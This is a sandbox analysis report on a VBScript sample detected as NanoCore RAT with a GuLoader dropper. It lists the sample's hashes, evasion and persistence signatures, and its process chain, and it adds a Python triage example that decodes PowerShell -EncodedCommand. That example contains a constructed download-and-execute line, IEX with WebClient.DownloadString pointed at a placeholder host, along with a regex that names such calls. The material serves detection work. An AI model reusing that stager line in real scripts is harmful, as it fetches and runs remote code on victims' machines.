Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name:IMG 0045434.vbs
Analysis ID:562140
MD5:813117cdcd80979365fd6d9586d11e4a
SHA1:e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256:1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa

Detection

Nanocore GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
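Several of the signatures above (Wscript starts Powershell, Encrypted powershell cmdline option found, Very long command line found, Suspicious Execution of Powershell with Base64) describe the same chain the process tree below shows: wscript.exe running the .vbs, then powershell.exe with -EncodedCommand. The following is an added example, not Joe Sandbox code and not part of this report, of how a responder can reproduce those checks over process-creation telemetry and recover the encoded script. The events are constructed in the shape Sysmon Event ID 1 exposes (pid, ppid, image, cmdline); the PIDs and image paths are taken from the tree, but the encoded payload is invented, since the real one is truncated in the report, and the 1024-character "very long" threshold is an assumption.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample data (not from the report): the report's process chain
# (wscript.exe PID 7064 -> powershell.exe PID 7640 -EncodedCommand) rebuilt as
# Sysmon-style process-creation records, plus a benign interactive control.


def encode_ps(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Invented stager text: a large inline blob followed by download-and-execute.
# The real payload is not on the page; this only stands in for its shape.
CONSTRUCTED_PAYLOAD = (
    "$buf = [Convert]::FromBase64String('" + "QUFB" * 300 + "');"
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
)

SAMPLE_EVENTS = [
    {"pid": 7064, "ppid": 4812,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"'},
    {"pid": 7640, "ppid": 7064,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand "'
                + encode_ps(CONSTRUCTED_PAYLOAD) + '"'},
    {"pid": 7700, "ppid": 2000,  # benign control: interactive PowerShell, no encoding
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

LONG_CMDLINE = 1024  # assumed threshold; the report does not state Joe Sandbox's
NETWORK_RE = re.compile(
    r"DownloadString|DownloadFile|WebClient|Invoke-WebRequest|Invoke-Expression|\bIEX\b",
    re.I,
)


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    f = token.lstrip("-/").lower()
    return f.startswith("e") and "encodedcommand".startswith(f)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when the command line carries -EncodedCommand, else None."""
    tokens = cmdline.split()  # whitespace split suffices: the base64 blob has no spaces
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(value.strip('"'), validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map each PID to the report-style signature names its record triggers."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        hits: List[str] = []
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"], {}).get("image", "").lower()
        # Script host spawning PowerShell: the wscript.exe -> powershell.exe edge in the tree
        if image.endswith("powershell.exe") and parent.endswith(("wscript.exe", "cscript.exe")):
            hits.append("Wscript starts Powershell")
        if len(e["cmdline"]) > LONG_CMDLINE:
            hits.append("Very long command line found")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded is not None:
            hits.append("Encrypted powershell cmdline option found")
            if NETWORK_RE.search(decoded):
                hits.append("Decoded command has network functionality")
        if hits:
            findings[e["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
    print(decode_encoded_command(SAMPLE_EVENTS[1]["cmdline"])[:80])
```

Decoding rather than pattern-matching the base64 is the point: -EncodedCommand is UTF-16LE under the base64, so byte-level string rules written for ASCII PowerShell ("DownloadString", "IEX") do not fire on the encoded form, and the same script can be re-encoded into a fresh blob at will. The decoded text is also what should be kept as evidence, since the report truncates the command line.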

Classification

  • System is w10x64native
  • wscript.exe (PID: 7064 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…